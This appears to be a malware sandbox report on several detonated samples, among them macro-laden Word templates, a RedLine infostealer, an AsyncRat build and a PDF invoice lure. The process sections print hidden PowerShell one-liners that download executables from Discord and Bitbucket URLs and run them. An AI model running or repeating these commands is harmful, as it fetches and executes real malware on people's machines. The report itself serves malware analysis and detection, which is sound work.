Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\example.dotm" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/1074394309446619298/1085646503940464700/putty.exe -Dest C:\Users\Public\putty.exe;C:\Users\Public\putty.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden Start-BitsTransfer -Sou https://bitbucket.org/damnman/damn/downloads/simplecryptservice.docx -Dest C:\Users\Public\simplecryptservice.docx;C:\Users\Public\simplecryptservice.docx

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/2952-0-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-1-0x00007FFB70A6D000-0x00007FFB70A6E000-memory.dmp

memory/2952-2-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-3-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-4-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-5-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-7-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-8-0x00007FFB30A50000-0x00007FFB30A60000-memory.dmp

memory/2952-6-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-9-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-10-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-11-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-12-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-14-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-13-0x00007FFB2E340000-0x00007FFB2E350000-memory.dmp

memory/2952-15-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-16-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-17-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-19-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-18-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-20-0x00007FFB2E340000-0x00007FFB2E350000-memory.dmp

memory/2952-50-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-57-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-58-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a86c68c9e4166329b14b63a95ac1d804
SHA1 71bd2f004e8a440ba57e55148b6c95f9b7876156
SHA256 96abd542ea3e65c821f57afc7b564c35f35dfaa3fc6a0e009bb4156527f69409
SHA512 1dc981c54481bef11a4046d7285ef746d86a8c228dd6fb8607db95d738fd69ca2f020cc1c7d74758dfcf110e52546f4d1f1d8a759c05124e10a1a60e7c272fbb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7b2ec28de6e6464c0efd0ed57d149946
SHA1 586a72e4b8324710c52fdc8ab9da9d49d67706fa
SHA256 3ecfaed27f3c46a3aa2a958aea7a4c3d317b3cfcb0ea86375825dc4eed709c3a
SHA512 4ab4047355c41cfcc67cb9d19332e2092696f1a4a1e9023e4a91ce3ce94c513bfd0f8b4c9323422d927d133e88d174e6a8dbd699abb91df1708ce31c44409abd

memory/2800-72-0x0000027CFB2F0000-0x0000027CFB312000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxi4bxqf.wc4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2800-91-0x0000027CFB7C0000-0x0000027CFB7E6000-memory.dmp

memory/2800-92-0x0000027CFB810000-0x0000027CFB824000-memory.dmp

memory/2952-93-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-94-0x00007FFB70A6D000-0x00007FFB70A6E000-memory.dmp

memory/2952-95-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1d94235176612f6abfdfa619ec6c4e66
SHA1 300ed4e2883aa3e30fde5f45daf6f84d37f8a57a
SHA256 df30e6f8bd5a62974e2b0823286b2a84f4e63beb1250cbb58cae2e10a6e1af5c
SHA512 4b416ab23c554dff1d83e7ad6c4a4cb4ab259b832e04af591557570d8625e9e8b928ed2d5bfc053d84d0ebe8f3870ee71c458ffe532963f79b753e750b6819e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 61e2e57471d559f5f6813c0a7995c075
SHA1 33c621541bc0892ddab1b65345a348c14af566e5
SHA256 c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d
SHA512 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

memory/2952-101-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-102-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-103-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

memory/2952-109-0x00007FFB709D0000-0x00007FFB70BC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDE303.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 45.93.201.114:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

memory/4876-0-0x00000000752CE000-0x00000000752CF000-memory.dmp

memory/4876-1-0x0000000000920000-0x0000000000B28000-memory.dmp

memory/4876-2-0x0000000004D00000-0x0000000004D92000-memory.dmp

memory/4876-3-0x0000000005370000-0x0000000005914000-memory.dmp

memory/4876-4-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/4876-5-0x00000000047E0000-0x00000000047EA000-memory.dmp

memory/5096-7-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

memory/4876-8-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-11-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-10-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-9-0x0000000005A00000-0x0000000006028000-memory.dmp

memory/5096-12-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-13-0x0000000005920000-0x0000000005942000-memory.dmp

memory/5096-15-0x00000000061C0000-0x0000000006226000-memory.dmp

memory/5096-14-0x00000000060A0000-0x0000000006106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wxbzmmvv.qjk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5096-21-0x0000000006230000-0x0000000006584000-memory.dmp

memory/5096-26-0x0000000006870000-0x000000000688E000-memory.dmp

memory/5096-27-0x00000000068B0000-0x00000000068FC000-memory.dmp

memory/5096-28-0x0000000007A10000-0x0000000007A54000-memory.dmp

memory/5096-29-0x0000000007B70000-0x0000000007BE6000-memory.dmp

memory/5096-30-0x0000000008270000-0x00000000088EA000-memory.dmp

memory/5096-31-0x0000000007C10000-0x0000000007C2A000-memory.dmp

memory/5096-32-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/5096-35-0x00000000752C0000-0x0000000075A70000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2660 set thread context of 3124 N/A C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
FR 188.165.208.165:43504 tcp
FR 188.165.208.165:43504 tcp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
FR 188.165.208.165:43504 tcp

Files

memory/2660-0-0x000000007474E000-0x000000007474F000-memory.dmp

memory/2660-1-0x0000000000F50000-0x0000000000F9A000-memory.dmp

memory/2660-2-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/2660-3-0x0000000005920000-0x0000000005986000-memory.dmp

memory/3124-5-0x0000000000540000-0x0000000000568000-memory.dmp

memory/3124-6-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/2660-8-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/3124-9-0x0000000005230000-0x0000000005848000-memory.dmp

memory/3124-10-0x0000000004D90000-0x0000000004E9A000-memory.dmp

memory/3124-11-0x0000000004CC0000-0x0000000004CD2000-memory.dmp

memory/3124-12-0x0000000004D20000-0x0000000004D5C000-memory.dmp

memory/3124-13-0x0000000074740000-0x0000000074EF0000-memory.dmp

memory/3124-14-0x0000000004EA0000-0x0000000004EEC000-memory.dmp

memory/3124-15-0x0000000074740000-0x0000000074EF0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

120s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm"

C:\Users\Admin\AppData\Local\Temp\powershell.exe

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2436-0-0x000000002F6C1000-0x000000002F6C2000-memory.dmp

memory/2436-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2436-2-0x0000000073C1D000-0x0000000073C28000-memory.dmp

memory/2436-4-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-5-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-10-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-11-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-9-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-8-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-7-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-6-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-14-0x0000000000490000-0x0000000000590000-memory.dmp

memory/2436-13-0x0000000073C1D000-0x0000000073C28000-memory.dmp

memory/2436-15-0x0000000000490000-0x0000000000590000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241023-en

Max time kernel

133s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1484 set thread context of 400 N/A C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Network

Country Destination Domain Proto
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp

Files

memory/1484-0-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

memory/1484-1-0x0000000001390000-0x0000000001438000-memory.dmp

memory/1484-2-0x0000000000410000-0x000000000041C000-memory.dmp

memory/1484-3-0x0000000000420000-0x0000000000428000-memory.dmp

memory/1484-4-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/400-8-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-13-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-17-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-15-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-19-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/1484-18-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/400-12-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/400-10-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-7-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-6-0x0000000000400000-0x0000000000416000-memory.dmp

memory/400-20-0x0000000074B00000-0x00000000751EE000-memory.dmp

memory/400-21-0x0000000074B00000-0x00000000751EE000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

117s

Max time network

131s

Command Line

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 b1cb39bfc00f36ca833ff0358c5384e1
SHA1 a5a5679303b0f345a67ece4e4b85c3620fdf2de9
SHA256 9933e0eb600158b9b788bef5f97ddf0872956e7595dd1ae537956dde879662d2
SHA512 5e36ae94fab428e5178ccac439b07502378db7a157145ac3f1fcecd65dfee075abff653ea2f7d1d0795a32c20b75e47dd581a9e9c898eacd808e253c62e6b3d9